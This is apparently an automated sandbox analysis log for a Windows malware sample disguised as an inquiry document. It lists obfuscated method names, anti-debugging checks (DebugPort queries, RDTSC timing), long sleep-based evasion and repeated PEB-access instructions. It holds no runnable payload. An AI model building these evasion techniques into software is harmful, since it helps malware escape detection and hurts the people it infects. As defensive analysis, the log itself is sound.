                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, QIxXUl9ykF6i6XwVuL.csHigh entropy of concatenated method names: 'jqLCedqrih', 'ibmCNJKuYu', 'YX2CpuSLT3', 'rhVCH1Ohp2', 'gpeCiKVIH2', 'G5XCJgfYAI', 'hLYCZ35mu6', 'iAXCMHkOt7', 'PW3CyIYgr9', 'OuuC4HE2e9'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, o4iFd1ygcCAYmOMS3r.csHigh entropy of concatenated method names: 'mbcXo5M08d', 'JW7XCdES4B', 'OlJX3q2Sq6', 'uoVXuEPyfB', 'GscXq4igWE', 'q9LXx3QQ9g', 'BVRXjltAa6', 'slAXUmGgwc', 'wuRXn4lDdt', 'lXhXtb7iWE'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, T1khdSprDUSyNMMGSX.csHigh entropy of concatenated method names: 'tXUFxsmw3H', 'S1xFjZkZmt', 'U36Fnpe9Ls', 'HXYFtJN2bk', 'lTZFgD5DoU', 'G78Fs3AWSE', 'bVyGHGcCqeKaSYos2B', 'Hsy9ZhgmNdOsrEb0E4', 'gGuFFWjcjm', 'pipFmxHU1K'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, tk95CgwBg05oKY2LBo.csHigh entropy of concatenated method names: 'ToString', 'iMAsEuxFJN', 'chDsvV26wA', 'DC2slRm4tg', 'cK4sPevSS6', 'jDlsSOiLXX', 'hNss0pa22v', 'bgJs2JtahX', 'QWEsbaZ4nh', 'GKjshyhNIK'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, nHy93WWjIw9E7ltEHb.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'wsLRyFOsvg', 'RfwR4hYcJq', 'LcVRzJPL0V', 'CcqmDiRaII', 'LQlmFyZkOu', 'MY2mRIFwho', 'JqMmmWGFON', 'l1qWX27MkCXHZRVp7KZ'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, e4YOeKc1sS6G73rwxfw.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'k0WkefeNxS', 'edvkNsse8p', 'gFJkpQ238o', 'TkJkHkwQ1T', 'MSSkivIK7A', 'CEkkJWiWoW', 'YrJkZdlnVx'
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe, Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe, Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\replace.exe, Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Memory allocated: 18B0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Memory allocated: 3210000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Memory allocated: 5210000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Memory allocated: 91D0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Memory allocated: 79E0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Memory allocated: A1D0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Memory allocated: B1D0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Memory allocated: B890000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Memory allocated: C890000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Memory allocated: D890000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Code function: 4_2_00F1096E rdtsc 4_2_00F1096E
                Source: C:\Windows\SysWOW64\replace.exe, Window / User API: threadDelayed 9842
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\replace.exe, API coverage: 2.6 %
                Source: C:\Windows\SysWOW64\replace.exe TID: 7696, Thread sleep count: 130 > 30
                Source: C:\Windows\SysWOW64\replace.exe TID: 7696, Thread sleep time: -260000s >= -30000s
                Source: C:\Windows\SysWOW64\replace.exe TID: 7696, Thread sleep count: 9842 > 30
                Source: C:\Windows\SysWOW64\replace.exe TID: 7696, Thread sleep time: -19684000s >= -30000s
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe TID: 7792, Thread sleep time: -80000s >= -30000s
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe TID: 7792, Thread sleep count: 41 > 30
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe TID: 7792, Thread sleep time: -41000s >= -30000s
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe TID: 7792, Thread sleep count: 33 > 30
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe TID: 7792, Thread sleep time: -49500s >= -30000s
                Source: C:\Windows\SysWOW64\replace.exe, Last function: Thread delayed
                Source: C:\Windows\SysWOW64\replace.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0294BC00 FindFirstFileW,FindNextFileW,FindClose,21_2_0294BC00
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\replace.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe Code function: 4_2_00417673 LdrLoadDll
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F5035C mov eax, dword ptr fs:[00000030h]4_2_00F5035C
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F5035C mov eax, dword ptr fs:[00000030h]4_2_00F5035C
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F5035C mov ecx, dword ptr fs:[00000030h]4_2_00F5035C
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F5035C mov eax, dword ptr fs:[00000030h]4_2_00F5035C
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F5035C mov eax, dword ptr fs:[00000030h]4_2_00F5035C
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F9A352 mov eax, dword ptr fs:[00000030h]4_2_00F9A352
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F52349 mov eax, dword ptr fs:[00000030h]4_2_00F52349
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F52349 mov eax, dword ptr fs:[00000030h]4_2_00F52349
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F52349 mov eax, dword ptr fs:[00000030h]4_2_00F52349
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F52349 mov eax, dword ptr fs:[00000030h]4_2_00F52349
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F52349 mov eax, dword ptr fs:[00000030h]4_2_00F52349
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F52349 mov eax, dword ptr fs:[00000030h]4_2_00F52349
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F52349 mov eax, dword ptr fs:[00000030h]4_2_00F52349
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F52349 mov eax, dword ptr fs:[00000030h]4_2_00F52349
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F52349 mov eax, dword ptr fs:[00000030h]4_2_00F52349
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F52349 mov eax, dword ptr fs:[00000030h]4_2_00F52349
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F52349 mov eax, dword ptr fs:[00000030h]4_2_00F52349
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F52349 mov eax, dword ptr fs:[00000030h]4_2_00F52349
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F52349 mov eax, dword ptr fs:[00000030h]4_2_00F52349
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F52349 mov eax, dword ptr fs:[00000030h]4_2_00F52349
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F52349 mov eax, dword ptr fs:[00000030h]4_2_00F52349
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0A30B mov eax, dword ptr fs:[00000030h]4_2_00F0A30B
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0A30B mov eax, dword ptr fs:[00000030h]4_2_00F0A30B
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0A30B mov eax, dword ptr fs:[00000030h]4_2_00F0A30B
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ECC310 mov ecx, dword ptr fs:[00000030h]4_2_00ECC310
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EF0310 mov ecx, dword ptr fs:[00000030h]4_2_00EF0310
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED04E5 mov ecx, dword ptr fs:[00000030h]4_2_00ED04E5
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F044B0 mov ecx, dword ptr fs:[00000030h]4_2_00F044B0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F5A4B0 mov eax, dword ptr fs:[00000030h]4_2_00F5A4B0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED64AB mov eax, dword ptr fs:[00000030h]4_2_00ED64AB
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F8A49A mov eax, dword ptr fs:[00000030h]4_2_00F8A49A
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F5C460 mov ecx, dword ptr fs:[00000030h]4_2_00F5C460
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EFA470 mov eax, dword ptr fs:[00000030h]4_2_00EFA470
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EFA470 mov eax, dword ptr fs:[00000030h]4_2_00EFA470
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EFA470 mov eax, dword ptr fs:[00000030h]4_2_00EFA470
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F8A456 mov eax, dword ptr fs:[00000030h]4_2_00F8A456
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EC645D mov eax, dword ptr fs:[00000030h]4_2_00EC645D
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0E443 mov eax, dword ptr fs:[00000030h]4_2_00F0E443
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0E443 mov eax, dword ptr fs:[00000030h]4_2_00F0E443
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0E443 mov eax, dword ptr fs:[00000030h]4_2_00F0E443
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0E443 mov eax, dword ptr fs:[00000030h]4_2_00F0E443
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0E443 mov eax, dword ptr fs:[00000030h]4_2_00F0E443
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0E443 mov eax, dword ptr fs:[00000030h]4_2_00F0E443
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0E443 mov eax, dword ptr fs:[00000030h]4_2_00F0E443
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0E443 mov eax, dword ptr fs:[00000030h]4_2_00F0E443
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EF245A mov eax, dword ptr fs:[00000030h]4_2_00EF245A
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0A430 mov eax, dword ptr fs:[00000030h]4_2_00F0A430
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ECC427 mov eax, dword ptr fs:[00000030h]4_2_00ECC427
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ECE420 mov eax, dword ptr fs:[00000030h]4_2_00ECE420
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ECE420 mov eax, dword ptr fs:[00000030h]4_2_00ECE420
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ECE420 mov eax, dword ptr fs:[00000030h]4_2_00ECE420
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F56420 mov eax, dword ptr fs:[00000030h]4_2_00F56420
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F56420 mov eax, dword ptr fs:[00000030h]4_2_00F56420
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F56420 mov eax, dword ptr fs:[00000030h]4_2_00F56420
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F56420 mov eax, dword ptr fs:[00000030h]4_2_00F56420
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F56420 mov eax, dword ptr fs:[00000030h]4_2_00F56420
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F56420 mov eax, dword ptr fs:[00000030h]4_2_00F56420
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F56420 mov eax, dword ptr fs:[00000030h]4_2_00F56420
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F08402 mov eax, dword ptr fs:[00000030h]4_2_00F08402
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F08402 mov eax, dword ptr fs:[00000030h]4_2_00F08402
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F08402 mov eax, dword ptr fs:[00000030h]4_2_00F08402
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EFE5E7 mov eax, dword ptr fs:[00000030h]4_2_00EFE5E7
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EFE5E7 mov eax, dword ptr fs:[00000030h]4_2_00EFE5E7
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EFE5E7 mov eax, dword ptr fs:[00000030h]4_2_00EFE5E7
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EFE5E7 mov eax, dword ptr fs:[00000030h]4_2_00EFE5E7
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EFE5E7 mov eax, dword ptr fs:[00000030h]4_2_00EFE5E7
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EFE5E7 mov eax, dword ptr fs:[00000030h]4_2_00EFE5E7
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EFE5E7 mov eax, dword ptr fs:[00000030h]4_2_00EFE5E7
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EFE5E7 mov eax, dword ptr fs:[00000030h]4_2_00EFE5E7
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED25E0 mov eax, dword ptr fs:[00000030h]4_2_00ED25E0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0C5ED mov eax, dword ptr fs:[00000030h]4_2_00F0C5ED
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0C5ED mov eax, dword ptr fs:[00000030h]4_2_00F0C5ED
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0A5D0 mov eax, dword ptr fs:[00000030h]4_2_00F0A5D0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0A5D0 mov eax, dword ptr fs:[00000030h]4_2_00F0A5D0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED65D0 mov eax, dword ptr fs:[00000030h]4_2_00ED65D0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0E5CF mov eax, dword ptr fs:[00000030h]4_2_00F0E5CF
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0E5CF mov eax, dword ptr fs:[00000030h]4_2_00F0E5CF
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F505A7 mov eax, dword ptr fs:[00000030h]4_2_00F505A7
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F505A7 mov eax, dword ptr fs:[00000030h]4_2_00F505A7
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F505A7 mov eax, dword ptr fs:[00000030h]4_2_00F505A7
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EF45B1 mov eax, dword ptr fs:[00000030h]4_2_00EF45B1
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EF45B1 mov eax, dword ptr fs:[00000030h]4_2_00EF45B1
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0E59C mov eax, dword ptr fs:[00000030h]4_2_00F0E59C
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED2582 mov eax, dword ptr fs:[00000030h]4_2_00ED2582
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED2582 mov ecx, dword ptr fs:[00000030h]4_2_00ED2582
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F04588 mov eax, dword ptr fs:[00000030h]4_2_00F04588
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0656A mov eax, dword ptr fs:[00000030h]4_2_00F0656A
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0656A mov eax, dword ptr fs:[00000030h]4_2_00F0656A
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0656A mov eax, dword ptr fs:[00000030h]4_2_00F0656A
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED8550 mov eax, dword ptr fs:[00000030h]4_2_00ED8550
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED8550 mov eax, dword ptr fs:[00000030h]4_2_00ED8550
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EFE53E mov eax, dword ptr fs:[00000030h]4_2_00EFE53E
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EFE53E mov eax, dword ptr fs:[00000030h]4_2_00EFE53E
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EFE53E mov eax, dword ptr fs:[00000030h]4_2_00EFE53E
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EFE53E mov eax, dword ptr fs:[00000030h]4_2_00EFE53E
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EFE53E mov eax, dword ptr fs:[00000030h]4_2_00EFE53E
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE0535 mov eax, dword ptr fs:[00000030h]4_2_00EE0535
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE0535 mov eax, dword ptr fs:[00000030h]4_2_00EE0535
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE0535 mov eax, dword ptr fs:[00000030h]4_2_00EE0535
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE0535 mov eax, dword ptr fs:[00000030h]4_2_00EE0535
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE0535 mov eax, dword ptr fs:[00000030h]4_2_00EE0535
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE0535 mov eax, dword ptr fs:[00000030h]4_2_00EE0535
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F66500 mov eax, dword ptr fs:[00000030h]4_2_00F66500
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00FA4500 mov eax, dword ptr fs:[00000030h]4_2_00FA4500
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00FA4500 mov eax, dword ptr fs:[00000030h]4_2_00FA4500
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00FA4500 mov eax, dword ptr fs:[00000030h]4_2_00FA4500
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00FA4500 mov eax, dword ptr fs:[00000030h]4_2_00FA4500
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00FA4500 mov eax, dword ptr fs:[00000030h]4_2_00FA4500
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00FA4500 mov eax, dword ptr fs:[00000030h]4_2_00FA4500
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00FA4500 mov eax, dword ptr fs:[00000030h]4_2_00FA4500
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F506F1 mov eax, dword ptr fs:[00000030h]4_2_00F506F1
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F506F1 mov eax, dword ptr fs:[00000030h]4_2_00F506F1
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F4E6F2 mov eax, dword ptr fs:[00000030h]4_2_00F4E6F2
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F4E6F2 mov eax, dword ptr fs:[00000030h]4_2_00F4E6F2
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F4E6F2 mov eax, dword ptr fs:[00000030h]4_2_00F4E6F2
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F4E6F2 mov eax, dword ptr fs:[00000030h]4_2_00F4E6F2
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0A6C7 mov ebx, dword ptr fs:[00000030h]4_2_00F0A6C7
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0A6C7 mov eax, dword ptr fs:[00000030h]4_2_00F0A6C7
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F066B0 mov eax, dword ptr fs:[00000030h]4_2_00F066B0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0C6A6 mov eax, dword ptr fs:[00000030h]4_2_00F0C6A6
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED4690 mov eax, dword ptr fs:[00000030h]4_2_00ED4690
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED4690 mov eax, dword ptr fs:[00000030h]4_2_00ED4690
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F02674 mov eax, dword ptr fs:[00000030h]4_2_00F02674
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0A660 mov eax, dword ptr fs:[00000030h]4_2_00F0A660
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0A660 mov eax, dword ptr fs:[00000030h]4_2_00F0A660
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F9866E mov eax, dword ptr fs:[00000030h]4_2_00F9866E
